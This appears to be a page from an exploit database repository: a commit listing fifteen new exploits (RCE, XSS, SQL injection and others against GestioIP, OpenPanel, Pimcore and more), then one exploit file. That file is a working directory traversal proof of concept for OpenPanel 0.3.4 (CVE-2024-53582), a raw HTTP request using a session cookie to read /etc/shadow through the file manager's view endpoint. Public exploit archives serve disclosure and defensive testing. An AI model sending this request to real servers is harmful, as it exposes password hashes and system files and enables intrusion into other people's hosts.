0f3d104e83
15 changes to exploits/shellcodes/ghdb ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF) GestioIP 3.5.7 - Cross-Site Scripting (XSS) GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS) GestioIP 3.5.7 - Remote Command Execution (RCE) GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS) OpenPanel 0.3.4 - Directory Traversal OpenPanel 0.3.4 - Incorrect Access Control OpenPanel 0.3.4 - OS Command Injection OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal Pimcore 11.4.2 - Stored cross site scripting Pimcore customer-data-framework 4.2.0 - SQL injection SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated) Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
22 lines
No EOL
812 B
Text
22 lines
No EOL
812 B
Text
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
|
|
# Date: Nov 25, 2024
|
|
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
|
|
# Vendor Homepage: https://openpanel.com/
|
|
# Software Link: https://openpanel.com/
|
|
# Version: 0.3.4
|
|
# Tested on: macOS
|
|
# CVE : CVE-2024-53582
|
|
|
|
GET /view_file?filename=shadow&path_param=/etc HTTP/2
|
|
Host: demo.openpanel.org:2083
|
|
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate, br
|
|
Referer: https://demo.openpanel.org:2083/files/
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
Priority: u=0
|
|
Te: trailers |